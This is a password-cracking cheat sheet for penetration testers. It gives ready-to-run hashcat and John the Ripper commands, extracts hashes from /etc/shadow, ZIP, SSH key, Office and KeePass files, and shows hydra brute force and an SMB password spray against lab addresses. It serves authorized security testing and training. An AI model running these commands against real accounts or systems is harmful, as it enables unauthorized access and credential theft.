CyberCheatsheets

Password Cracking Cheat Sheet

Password cracking workflow: identify the hash, pick the right mode, and crack offline (hashcat/john) or online (hydra) on authorized targets.

Passwords & Crackinghashcathasheshydrajohnpassword-crackingUpdated 2026-06-17

Overview

Password cracking splits into offline (you have the hash, crack it with hashcat/john) and online (you guess against a live service with hydra/netexec). The workflow is always: identify the hash type, choose an attack (wordlist, rules, mask, hybrid), then run. This sheet ties together hash-id, hashcat, john, and hydra into one reference.

Authorized testing only. Crack only hashes and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Identify the hash

Identify hash type and show the hashcat mode (-m)

hashid -m 'HASH'

Interactive identifier (alternative)

hash-identifier

name-that-hash — modern identifier with hashcat/john refs

nth --text 'HASH'

hashcat (GPU, fast)

MD5, straight wordlist attack

hashcat -m 0 -a 0 hashes.txt rockyou.txt

NTLM with the best64 rule set

hashcat -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule

sha512crypt (Linux /etc/shadow)

hashcat -m 1800 sha512.txt rockyou.txt

WPA/WPA2 handshake

hashcat -m 22000 capture.hc22000 wordlist.txt

Mask/brute attack (Ulllldd pattern)

hashcat -m 0 -a 3 hashes.txt '?u?l?l?l?l?d?d'

Show already-cracked results from the potfile

hashcat -m 1000 ntlm.txt --show

John the Ripper

Wordlist mode

john --wordlist=rockyou.txt hashes.txt

Force a hash format

john --format=raw-md5 --wordlist=rockyou.txt hashes.txt

Apply mangling rules

john --rules --wordlist=rockyou.txt hashes.txt

Display cracked passwords

john --show hashes.txt

Combine passwd+shadow for John

unshadow /etc/passwd /etc/shadow > unshadowed.txt

Format converters (*2john)

Extract a crackable hash from a ZIP

zip2john secret.zip > zip.hash

From an encrypted SSH private key

ssh2john id_rsa > ssh.hash

From a password-protected Office file

office2john doc.docx > office.hash

From a KeePass database

keepass2john db.kdbx > kp.hash

Online cracking (hydra)

SSH single-user, password list

hydra -l admin -P rockyou.txt ssh://10.10.10.5

FTP user+pass lists

hydra -L users.txt -P pass.txt ftp://10.10.10.5

HTTP POST login form

hydra -l admin -P pass.txt 10.10.10.5 http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'

Password spray over SMB

nxc smb 10.10.10.0/24 -u users.txt -p 'Spring2026!' --continue-on-success

Tips

  • Identify the hash first — the wrong mode/format wastes hours. hashid/nth give you the exact -m/--format.
  • Wordlist + rules (best64, OneRuleToRuleThemAll) cracks far more than a raw wordlist alone.
  • hashcat is GPU-accelerated and much faster than John for large jobs; John shines for odd formats and *2john tools.
  • Online attacks are slow and noisy — watch lockout policy; prefer offline cracking whenever you have the hash.

References

Aide-mémoires similaires